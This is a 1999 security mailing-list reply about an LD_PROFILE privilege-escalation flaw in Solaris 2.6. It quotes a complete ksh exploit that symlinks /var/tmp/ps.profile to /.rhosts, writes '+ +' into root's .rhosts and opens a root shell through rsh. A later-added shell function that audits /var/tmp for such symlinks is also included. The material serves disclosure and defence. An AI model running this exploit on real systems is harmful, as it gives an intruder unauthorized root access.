Re: LD_PROFILE local root exploit for solaris 2.6

From: Pavel Kankovsky (peakat_private)
Date: Fri Sep 24 1999 - 17:25:52 PDT


    On Wed, 22 Sep 1999, Steve Mynott wrote:
    
    > works on solaris 2.6 sparc anyway...
    >
    > #! /bin/ksh
    > #  LD_PROFILE local root exploit for solaris
    > #  steveat_private 19990922
    > umask 000
    > ln -s /.rhosts /var/tmp/ps.profile
    > export LD_PROFILE=/usr/bin/ps
    > /usr/bin/ps
    > echo + + >  /.rhosts
    > rsh -l root localhost csh -i
    
    Old news. I discovered this problem and informed Sun about it in
    June 1998. I cannot verify it right now but I think they have already made
    a patch for it.
    
    GNU libc 2.something used to be affected as well. The odds are other
    platforms having this particular nifty feature (if they exist at all) are
    still vulnerable because I forgot to tell Bugtraq about it.
    Oh, mea culpa! :)
    
    --Pavel Kankovsky aka Peak  [ Boycott Microsoft--http://www.vcnet.com/bms ]
    "Resistance is futile. Open your source code and prepare for assimilation."
    
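A check for the precondition the quoted script sets up, a symlink named `*.profile` in `/var/tmp`. This is an added example, not part of the original message or of any vendor tooling; the function name `audit_profile_links` and the output format are assumptions made here.

```shell
#!/bin/sh
# Added example: report symlinks named *.profile in a shared temp directory.
# The quoted script plants /var/tmp/ps.profile as a link to a root-owned path,
# so any symlink matching that naming pattern deserves a look.

audit_profile_links() {
    dir=${1:-/var/tmp}
    for f in "$dir"/*.profile; do
        # Skip regular files and the unexpanded glob when nothing matches.
        [ -L "$f" ] || continue

        target=$(readlink "$f")

        # A dangling link means the target does not exist yet and would be
        # created by whatever process writes through the link.
        if [ -e "$f" ]; then
            state=exists
        else
            state=dangling
        fi

        # Owner of the link itself (ls -l on a symlink does not follow it).
        owner=$(ls -ld "$f" | awk '{print $3}')

        printf 'SUSPECT %s -> %s [%s] owner=%s\n' "$f" "$target" "$state" "$owner"
    done
    return 0
}
```

Call it as `audit_profile_links /var/tmp`; each `SUSPECT` line names the link, where it points, whether the target already exists, and who created the link.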


